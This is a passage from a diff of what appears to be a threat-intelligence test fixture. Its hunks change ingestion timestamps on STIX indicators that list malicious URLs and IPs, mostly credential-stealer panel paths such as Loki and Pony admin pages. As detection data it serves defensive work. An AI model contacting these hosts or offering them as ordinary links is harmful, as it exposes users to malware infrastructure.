CyberCrime\",\"id\":\"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-22T02:54:58.082Z\",\"name\":\"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:58.082Z\"}", "category": "threat", "type": "indicator", @@ -27214,7 +27214,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026077900Z", + "ingested": "2021-12-14T14:57:43.118429705Z", "original": "{\"created\":\"2020-02-22T02:54:59.268Z\",\"description\":\"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-22T02:54:59.268Z\",\"name\":\"mal_url: http://89.160.20.156/primsix/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primsix/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.268Z\"}", "category": "threat", "type": "indicator", @@ -27266,7 +27266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026084300Z", + "ingested": "2021-12-14T14:57:43.118430208Z", "original": "{\"created\":\"2020-02-22T02:54:59.71Z\",\"description\":\"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:54:59.71Z\",\"name\":\"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.71Z\"}", "category": "threat", "type": "indicator", @@ -27318,7 +27318,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026090200Z", + "ingested": "2021-12-14T14:57:43.118430650Z", "original": "{\"created\":\"2020-02-22T02:55:06.175Z\",\"description\":\"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:06.175Z\",\"name\":\"mal_url: http://nortonlilly.info/jp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:06.175Z\"}", "category": "threat", "type": "indicator", @@ -27370,7 +27370,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026118500Z", + "ingested": "2021-12-14T14:57:43.118431086Z", "original": "{\"created\":\"2020-02-22T02:55:16.703Z\",\"description\":\"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:16.703Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:16.703Z\"}", "category": "threat", "type": "indicator", @@ -27421,7 +27421,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026122900Z", + "ingested": "2021-12-14T14:57:43.118431655Z", "original": "{\"created\":\"2020-02-22T02:55:26.13Z\",\"description\":\"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-45\"],\"modified\":\"2020-02-22T02:55:26.13Z\",\"name\":\"mal_url: http://67.215.224.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:26.13Z\"}", "category": "threat", "type": "indicator", @@ -27473,7 +27473,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026127400Z", + "ingested": "2021-12-14T14:57:43.118432172Z", "original": "{\"created\":\"2020-02-22T02:55:32.068Z\",\"description\":\"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-22T02:55:32.068Z\",\"name\":\"mal_url: http://abyng.com/mg/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://abyng.com/mg/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:32.068Z\"}", "category": "threat", "type": "indicator", @@ -27518,7 +27518,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026132600Z", + "ingested": "2021-12-14T14:57:43.118432559Z", "original": "{\"created\":\"2020-02-22T02:55:34.073Z\",\"description\":\"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:34.073Z\",\"name\":\"mal_ip: 192.168.118.182\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.182']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:34.073Z\"}", "category": "threat", "type": "indicator", @@ -27563,7 +27563,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026136700Z", + "ingested": "2021-12-14T14:57:43.118432965Z", "original": "{\"created\":\"2020-02-22T02:55:37.882Z\",\"description\":\"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-22T02:55:37.882Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:37.882Z\"}", "category": "threat", "type": "indicator", @@ -27615,7 +27615,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026142600Z", + "ingested": "2021-12-14T14:57:43.118433437Z", "original": "{\"created\":\"2020-02-22T02:55:50.468Z\",\"description\":\"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-22T02:55:50.468Z\",\"name\":\"mal_url: http://d0lphin1337.xyz/autofarm/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:50.468Z\"}", "category": "threat", "type": "indicator", @@ -27667,7 +27667,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026164900Z", + "ingested": "2021-12-14T14:57:43.118433886Z", "original": "{\"created\":\"2020-02-22T02:55:52.759Z\",\"description\":\"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:52.759Z\",\"name\":\"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:52.759Z\"}", "category": "threat", "type": "indicator", @@ -27719,7 +27719,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026170200Z", + "ingested": "2021-12-14T14:57:43.118434325Z", "original": "{\"created\":\"2020-02-23T02:51:55.106Z\",\"description\":\"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--516caba2-8889-4f32-96e6-e4874a705085\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:51:55.106Z\",\"name\":\"mal_url: http://89.160.20.156/plugman/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/plugman/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.106Z\"}", "category": "threat", "type": "indicator", @@ -27771,7 +27771,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026174Z", + "ingested": "2021-12-14T14:57:43.118434793Z", "original": "{\"created\":\"2020-02-23T02:51:55.126Z\",\"description\":\"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime\",\"id\":\"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-100\"],\"modified\":\"2020-02-23T02:51:55.126Z\",\"name\":\"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.126Z\"}", "category": "threat", "type": "indicator", @@ -27823,7 +27823,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026179500Z", + "ingested": "2021-12-14T14:57:43.118435404Z", "original": "{\"created\":\"2020-02-23T02:52:00.436Z\",\"description\":\"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--015e9665-1524-4e79-841d-8038961e0250\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:52:00.436Z\",\"name\":\"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:00.436Z\"}", "category": "threat", "type": "indicator", @@ -27875,7 +27875,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026209200Z", + "ingested": "2021-12-14T14:57:43.118435803Z", "original": "{\"created\":\"2020-02-23T02:52:11.479Z\",\"description\":\"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:52:11.479Z\",\"name\":\"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:11.479Z\"}", "category": "threat", "type": "indicator", @@ -27927,7 +27927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026213400Z", + "ingested": "2021-12-14T14:57:43.118436714Z", "original": "{\"created\":\"2020-02-23T02:52:31.664Z\",\"description\":\"TS ID: 55342497257; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--c48537ec-9991-441c-89e6-f41295aa8b88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-23T02:52:31.664Z\",\"name\":\"mal_url: http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:31.664Z\"}", "category": "threat", "type": "indicator", @@ -27979,7 +27979,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026217700Z", + "ingested": "2021-12-14T14:57:43.118437281Z", "original": "{\"created\":\"2020-02-23T02:52:36.705Z\",\"description\":\"TS ID: 55342497265; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c580668f-1fd0-49e7-bea8-fe3effa1854a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:52:36.705Z\",\"name\":\"mal_url: http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:36.705Z\"}", "category": "threat", "type": "indicator", @@ -28031,7 +28031,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026221100Z", + "ingested": "2021-12-14T14:57:43.118437799Z", "original": "{\"created\":\"2020-02-23T02:52:38.725Z\",\"description\":\"TS ID: 55342497253; iType: mal_url; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--97f5e99e-bdb3-4f2e-b9e6-b820f6c6e17c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:52:38.725Z\",\"name\":\"mal_url: http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:38.725Z\"}", "category": "threat", "type": "indicator", @@ -28083,7 +28083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026226800Z", + "ingested": "2021-12-14T14:57:43.118438229Z", "original": "{\"created\":\"2020-02-23T02:52:43.45Z\",\"description\":\"TS ID: 55342497299; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--53d3da3c-985b-4045-bb67-cac32740c8a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:43.45Z\",\"name\":\"mal_url: http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:43.45Z\"}", "category": "threat", "type": "indicator", @@ -28135,7 +28135,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026231600Z", + "ingested": "2021-12-14T14:57:43.118438678Z", "original": "{\"created\":\"2020-02-23T02:52:44.281Z\",\"description\":\"TS ID: 55342497255; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--19faa6b5-809f-4a97-9415-10aa8711a095\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:52:44.281Z\",\"name\":\"mal_url: http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:44.281Z\"}", "category": "threat", "type": "indicator", @@ -28186,7 +28186,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026255Z", + "ingested": "2021-12-14T14:57:43.118439194Z", "original": "{\"created\":\"2020-02-23T02:52:46.455Z\",\"description\":\"TS ID: 55342497238; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--f023fd7f-9128-4b43-b8a4-4e18a33dbbf0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:52:46.455Z\",\"name\":\"mal_url: http://f0405406.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405406.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:46.455Z\"}", "category": "threat", "type": "indicator", @@ -28238,7 +28238,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026285Z", + "ingested": "2021-12-14T14:57:43.118439687Z", "original": "{\"created\":\"2020-02-23T02:52:55.747Z\",\"description\":\"TS ID: 55342497297; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--15290dad-dffe-413d-b14c-e1bcbf9c5f62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:55.747Z\",\"name\":\"mal_url: http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:55.747Z\"}", "category": "threat", "type": "indicator", @@ -28290,7 +28290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026290800Z", + "ingested": "2021-12-14T14:57:43.118440136Z", "original": "{\"created\":\"2020-02-23T02:53:08.502Z\",\"description\":\"TS ID: 55342497311; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--d04b02bf-6282-4889-95d0-bcebf5f7f3a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:53:08.502Z\",\"name\":\"mal_url: http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.502Z\"}", "category": "threat", "type": "indicator", @@ -28342,7 +28342,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026296300Z", + "ingested": "2021-12-14T14:57:43.118440792Z", "original": "{\"created\":\"2020-02-23T02:53:08.537Z\",\"description\":\"TS ID: 55342497243; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--b3da183c-cefb-4014-bc60-b838648be7b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:53:08.537Z\",\"name\":\"mal_url: http://mez.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mez.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.537Z\"}", "category": "threat", "type": "indicator", @@ -28394,7 +28394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026320500Z", + "ingested": "2021-12-14T14:57:43.118441294Z", "original": "{\"created\":\"2020-02-23T02:53:08.568Z\",\"description\":\"TS ID: 55342497237; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f18c4197-55ad-4dba-beaf-8b57fd984245\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-23T02:53:08.568Z\",\"name\":\"mal_url: http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.568Z\"}", "category": "threat", "type": "indicator", @@ -28446,7 +28446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026327400Z", + "ingested": "2021-12-14T14:57:43.118441735Z", "original": "{\"created\":\"2020-02-23T02:53:09.543Z\",\"description\":\"TS ID: 55342497304; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a11a5e52-cd1d-4891-96a6-a9b78a260843\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.543Z\",\"name\":\"mal_url: http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.543Z\"}", "category": "threat", "type": "indicator", @@ -28498,7 +28498,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026331500Z", + "ingested": "2021-12-14T14:57:43.118442187Z", "original": "{\"created\":\"2020-02-23T02:53:09.578Z\",\"description\":\"TS ID: 55342497256; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a5c5b970-919b-4464-b7db-694194d08632\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:09.578Z\",\"name\":\"mal_url: http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.578Z\"}", "category": "threat", "type": "indicator", @@ -28550,7 +28550,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026336300Z", + "ingested": "2021-12-14T14:57:43.118442765Z", "original": "{\"created\":\"2020-02-23T02:53:09.612Z\",\"description\":\"TS ID: 55342497234; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--60a33c8d-316e-4688-b9f8-e68c82aa36b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.612Z\",\"name\":\"mal_url: http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.612Z\"}", "category": "threat", "type": "indicator", @@ -28601,7 +28601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026342100Z", + "ingested": "2021-12-14T14:57:43.118443223Z", "original": "{\"created\":\"2020-02-23T02:53:12.354Z\",\"description\":\"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:53:12.354Z\",\"name\":\"mal_url: http://f0405230.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405230.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:12.354Z\"}", "category": "threat", "type": "indicator", @@ -28653,7 +28653,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026347400Z", + "ingested": "2021-12-14T14:57:43.118443614Z", "original": "{\"created\":\"2020-02-23T02:53:17.566Z\",\"description\":\"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:53:17.566Z\",\"name\":\"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:17.566Z\"}", "category": "threat", "type": "indicator", @@ -28705,7 +28705,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026351300Z", + "ingested": "2021-12-14T14:57:43.118444096Z", "original": "{\"created\":\"2020-02-23T02:53:19.805Z\",\"description\":\"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ebf656cd-162d-40e8-8c3a-272285600583\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:53:19.805Z\",\"name\":\"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:19.805Z\"}", "category": "threat", "type": "indicator", @@ -28757,7 +28757,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026356700Z", + "ingested": "2021-12-14T14:57:43.118446702Z", "original": "{\"created\":\"2020-02-23T02:53:27.698Z\",\"description\":\"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-23T02:53:27.698Z\",\"name\":\"mal_url: http://89.160.20.156/primone/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primone/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.698Z\"}", "category": "threat", "type": "indicator", @@ -28809,7 +28809,7 @@ } }, "event": { - "ingested": 